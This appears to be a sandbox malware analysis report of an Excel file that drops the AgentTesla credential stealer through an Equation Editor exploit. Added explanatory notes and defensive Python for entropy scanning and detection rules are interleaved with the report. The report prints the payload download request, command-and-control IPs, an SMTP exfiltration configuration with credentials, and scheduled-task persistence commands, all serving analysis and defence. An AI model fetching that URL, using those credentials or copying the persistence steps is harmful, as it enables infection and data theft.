Windows Analysis Report Doc2.xlsx

Overview

General Information

Sample Name: Doc2.xlsx
Analysis ID: 452692
MD5: 7848697a2cff990710c69e8d97e55c13
SHA1: 9af272f7dedd808c48b03d98d7eb75356b74f6ee
SHA256: ef17f47bcdb067d712661ddadff8ebee2924282c7fe21edd237e8094cc4ebdb0
Tags: VelvetSweatshop, xlsx

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
.NET source code contains very large strings
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Office equation editor drops PE file
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Execution from Suspicious Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://arkemagrup.com/Doc_87654334567.exe Avira URL Cloud: Label: malware
Found malware configuration
Source: 11.2.MLdAu.exe.30ee310.3.unpack Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "account@jiqdyi.com", "Password": "Emotion22", "Host": "mail.spamora.net"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Doc_87654334567[1].exe ReversingLabs: Detection: 13%
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe ReversingLabs: Detection: 13%
Source: C:\Users\user\AppData\Roaming\WzyRXCWtdGSdEA.exe ReversingLabs: Detection: 13%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 13%
Multi AV Scanner detection for submitted file
Source: Doc2.xlsx ReversingLabs: Detection: 28%

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: .pDBl source: vbc.exe, 00000006.00000002.2229803981.0000000002311000.00000004.00000001.sdmp, vbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmp, MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmp

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: arkemagrup.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 185.26.106.165:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 185.26.106.165:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 68MB

Networking:

Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 185.26.106.194:587
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.26.106.194
Source: Joe Sandbox View IP Address: 185.26.106.165
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ATE-ASFR
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 185.26.106.194:587
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected:
GET /Doc_87654334567.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: arkemagrup.com
Connection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\38D6D8CE.emf
Source: vbc.exe, 00000009.00000002.2370250103.000000000093D000.00000004.00000020.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown DNS traffic detected: queries for: arkemagrup.com
Source: vbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: vbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmp String found in binary or memory: http://BGwprh.com
Source: vbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmp String found in binary or memory: http://DynDns.comDynDNS
Source: vbc.exe, 00000009.00000002.2370750272.00000000023D5000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: vbc.exe, 00000009.00000002.2370750272.00000000023D5000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: vbc.exe, 00000009.00000002.2370250103.000000000093D000.00000004.00000020.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: vbc.exe, 00000009.00000002.2370750272.00000000023D5000.00000004.00000001.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: vbc.exe, 00000009.00000002.2370250103.000000000093D000.00000004.00000020.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: vbc.exe, 00000009.00000002.2370164417.00000000008CD000.00000004.00000020.sdmp, vbc.exe, 00000009.00000003.2293255125.0000000006170000.00000004.00000001.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: vbc.exe, 00000009.00000002.2370750272.00000000023D5000.00000004.00000001.sdmp String found in binary or memory: http://mail.spamora.net
Source: vbc.exe, 00000009.00000002.2370750272.00000000023D5000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: vbc.exe, 00000009.00000002.2370250103.000000000093D000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: vbc.exe, 00000009.00000002.2370250103.000000000093D000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: vbc.exe, 00000009.00000002.2370250103.000000000093D000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: vbc.exe, 00000009.00000002.2370750272.00000000023D5000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.sectigo.com0%
Source: vbc.exe, 00000006.00000002.2235845813.000000000B8F0000.00000002.00000001.sdmp, vbc.exe, 00000009.00000002.2375831529.0000000005CD0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000006.00000002.2229803981.0000000002311000.00000004.00000001.sdmp, MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: vbc.exe, 00000009.00000002.2382948268.0000000008610000.00000002.00000001.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: vbc.exe, 00000006.00000002.2235845813.000000000B8F0000.00000002.00000001.sdmp, vbc.exe, 00000009.00000002.2375831529.0000000005CD0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: vbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmp String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: vbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmp String found in binary or memory: https://login.blockchain.com/HD?m
Source: vbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmp String found in binary or memory: https://login.blockchain.com/ObjectLengthChainingModeGCMAuthTagLengthChainingModeKeyDataBlobAESMicro
Source: vbc.exe, 00000009.00000002.2370750272.00000000023D5000.00000004.00000001.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: vbc.exe, 00000006.00000002.2230917923.00000000034B9000.00000004.00000001.sdmp, vbc.exe, 00000009.00000002.2369735651.0000000000402000.00000040.00000001.sdmp, MLdAu.exe, 0000000B.00000002.2342137023.0000000002FF1000.00000004.00000001.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: vbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a window with clipboard capturing capabilities
Source: C:\Users\Public\vbc.exe Window created: window name: CLIPBRDWNDCLASS

System Summary:

.NET source code contains very large strings
Source: vbc.exe.4.dr, Utilities/UI.Controls/Design/YaTabControlDesigner.cs Long String: Length: 32771
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Doc_87654334567[1].exe
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Memory allocated: 76D20000 page execute and read and write
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: Doc2.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Doc_87654334567[1].exe 3441D4122B712A32E1C0518F02903A632ECBF557FBAB71C510C732474D326CD1
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe 3441D4122B712A32E1C0518F02903A632ECBF557FBAB71C510C732474D326CD1
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\WzyRXCWtdGSdEA.exe 3441D4122B712A32E1C0518F02903A632ECBF557FBAB71C510C732474D326CD1
Source: Doc_87654334567[1].exe.4.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc.exe.4.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@18/28@7/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Doc2.xlsx
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Mutant created: \Sessions\1\BaseNamedObjects\bCmLOidXVAcpgGmAXeH
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVREE54.tmp
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ERROR:
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\Public\vbc.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Doc2.xlsx ReversingLabs: Detection: 28%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmpB2BC.tmp'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe {path}
Source: unknown Process created: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe 'C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe'
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmp74F2.tmp'
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmp7511.tmp'
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process created: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe {path}
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmpB2BC.tmp' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe {path} Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmp7511.tmp' Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process created: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe {path} Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmp74F2.tmp' Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: Doc2.xlsx Static file information: File size 1239552 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: .pDBl source: vbc.exe, 00000006.00000002.2229803981.0000000002311000.00000004.00000001.sdmp, vbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmp, MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmp
Source: Doc2.xlsx Initial sample: OLE indicators vbamacros = False
Source: Doc2.xlsx Initial sample: OLE indicators encrypted = True

Data Obfuscation:

barindex
.NET source code contains potential unpacker
Source: vbc.exe.4.dr, Utilities/YatcForm.cs .Net Code: EFEFEFEFEFEF System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 6_2_10727F11 push es; iretd 6_2_1072815A
Source: C:\Users\Public\vbc.exe Code function: 6_2_00319718 push esp; retf 6_2_00319719
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 11_2_10FC7F11 push es; iretd 11_2_10FC815A
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 11_2_002E7198 push eax; retn 0018h 11_2_002E71E5
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 11_2_002E9718 push esp; retf 11_2_002E9719
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 11_2_002E8B80 pushad ; ret 11_2_002E8C19
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 12_2_00279718 push esp; retf 12_2_00279719
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Code function: 17_2_10FC7F11 push es; iretd 17_2_10FC815A
Source: initial sample Static PE information: section name: .text entropy: 7.51973544971
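The two obfuscation indicators above point the same way: a .NET loader that hands a byte array to AppDomain.Load, and a .text section whose entropy (7.52) is close to the 8.0 ceiling, which is what an encrypted or compressed payload sitting inside a code section looks like. The following Python is an added example written for this page, not code from the sandbox report or from the sample; it parses the PE section table by hand (a real triage script would normally use the pefile library) and scores each section's Shannon entropy, then exercises the scanner on a constructed PE image built in memory. The 7.0 threshold, the section layout and the test image are this example's assumptions.

```python
import hashlib
import math
import struct


def shannon_entropy(data):
    """Shannon entropy of a byte string in bits per byte (0.0 for constant data, 8.0 for uniform)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_sections(image):
    """Yield (name, raw_bytes) for every section of a PE image, read straight from the headers."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    num_sections = struct.unpack_from("<H", image, e_lfanew + 6)[0]
    size_opt = struct.unpack_from("<H", image, e_lfanew + 20)[0]
    table = e_lfanew + 24 + size_opt            # section table follows the optional header
    for i in range(num_sections):
        off = table + 40 * i                    # IMAGE_SECTION_HEADER is 40 bytes
        name = image[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", image, off + 16)
        yield name, image[raw_ptr:raw_ptr + raw_size]


def section_entropies(image):
    return [(name, shannon_entropy(data)) for name, data in pe_sections(image)]


def packed_sections(image, threshold=7.0):
    """Names of sections whose entropy suggests packed or encrypted content (threshold is a heuristic)."""
    return [name for name, h in section_entropies(image) if h >= threshold]


def build_test_pe(sections):
    """Assemble a minimal, non-runnable PE32 image from [(name, bytes)] so the scanner runs offline."""
    e_lfanew, size_opt = 0x40, 0xE0
    table = e_lfanew + 24 + size_opt
    ptr = table + 40 * len(sections)            # raw data starts right after the section table
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, size_opt, 0x102)
    opt = struct.pack("<H", 0x10B) + b"\0" * (size_opt - 2)
    headers, body = bytearray(dos + coff + opt), bytearray()
    for name, data in sections:
        headers += name.encode("ascii").ljust(8, b"\0")
        headers += struct.pack("<IIII", len(data), 0x1000, len(data), ptr)
        headers += b"\0" * 16                   # relocations, line numbers, characteristics
        body += data
        ptr += len(data)
    return bytes(headers + body)


# Constructed sample image: a "code" section of deterministic pseudo-random bytes (what an
# encrypted payload looks like), a text-like section, and an all-zero section.
PACKED_BLOB = b"".join(hashlib.sha256(i.to_bytes(4, "little")).digest() for i in range(128))
SAMPLE_PE = build_test_pe([
    (".text", PACKED_BLOB),
    (".rdata", b"Hello from a plain resource string. " * 100),
    (".rsrc", b"\0" * 2048),
])

if __name__ == "__main__":
    for name, h in section_entropies(SAMPLE_PE):
        print("%-8s %.3f" % (name, h))
    print("packed:", packed_sections(SAMPLE_PE))
```

A high-entropy .text section on its own is only a hint (legitimately compressed resources score the same), which is why the report pairs it with the Assembly.Load(byte[]) call: the loader has to decrypt the blob into a byte array before the runtime can map it, so the decrypted second stage is recoverable from memory even though it never touches disk.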

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Roaming\WzyRXCWtdGSdEA.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Doc_87654334567[1].exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmpB2BC.tmp'
Source: C:\Users\Public\vbc.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run MLdAu Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe:Zone.Identifier read attributes | delete Jump to behavior
Note: the Zone.Identifier alternate data stream is where Windows stores Mark-of-the-Web. Opening it with delete access on the freshly dropped MLdAu.exe strips that mark, so the copy later started from the Run value or the scheduled task is no longer treated as an Internet-origin file by SmartScreen and other MOTW-aware checks.
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\Public\vbc.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Note: CryptoAPI registers a change notification on the AuthRoot certificate store whenever a process builds a certificate chain, which any TLS client does, so this entry is weak evidence on its own; the autostart entries that matter here are the HKCU Run value and the scheduled task listed under Boot Survival.
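The process chain in the System Summary (EQNEDT32.EXE launching vbc.exe from C:\Users\Public, which registers a scheduled task from a temp-file XML and an HKCU Run value) and the Zone.Identifier deletion above are the events a detection engineer would turn into rules. The following Python is an added example written for this page, not part of the sandbox report or of any detection product; it runs those rules over a handful of constructed events modelled on the report's lines. The event schema, the rule names, the severities and the path patterns are this example's own assumptions rather than a Sysmon or Sigma format.

```python
import re

# Locations an unprivileged user can write to; a payload executing from here matches the
# report's "Execution from Suspicious Folder" signature. (Assumed patterns for this example.)
USER_WRITABLE = re.compile(r"^c:\\users\\(public|[^\\]+\\appdata)\\", re.I)
TEMP_DIR = re.compile(r"\\appdata\\local\\temp\\", re.I)
RUN_KEY = re.compile(r"\\currentversion\\run(once)?\b", re.I)
XML_ARG = re.compile(r"/xml\s+['\"]?([^'\"]+)", re.I)


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def triage(events):
    """Apply the rules to a list of event dicts and return the findings.

    Event schema (constructed for this example):
      process : parent, image, cmdline
      registry: image, target
      file    : image, target, access
    """
    findings = []

    def hit(severity, rule, ev, detail):
        findings.append({"severity": severity, "rule": rule,
                         "image": ev["image"], "detail": detail})

    for ev in events:
        if ev["type"] == "process":
            # Equation Editor has no business spawning children: any child process is the
            # CVE-2017-11882 / CVE-2018-0802 exploitation pattern from the report.
            if _basename(ev["parent"]) == "eqnedt32.exe":
                hit("high", "equation_editor_child", ev, "spawned by " + ev["parent"])
            if USER_WRITABLE.search(ev["image"]):
                hit("low", "suspicious_path_execution", ev, ev["image"])
            cmd = ev["cmdline"].lower()
            if _basename(ev["image"]) == "schtasks.exe" and "/create" in cmd:
                m = XML_ARG.search(ev["cmdline"])
                xml = m.group(1) if m else ""
                # A task definition handed over as a temp-file XML, or created by a binary
                # running from a user-writable directory, is the persistence pattern here.
                if TEMP_DIR.search(xml) or USER_WRITABLE.search(ev["parent"]):
                    hit("high", "schtasks_xml_from_temp", ev,
                        "task XML %s created by %s" % (xml or "<none>", ev["parent"]))
        elif ev["type"] == "registry":
            if RUN_KEY.search(ev["target"]) and USER_WRITABLE.search(ev["image"]):
                hit("high", "run_key_from_user_path", ev, ev["target"])
        elif ev["type"] == "file":
            # Deleting the Zone.Identifier stream strips Mark-of-the-Web from the dropped file.
            if (ev["target"].lower().endswith(":zone.identifier")
                    and "delete" in ev.get("access", "").lower()):
                hit("high", "motw_stream_removed", ev, ev["target"])
    return findings


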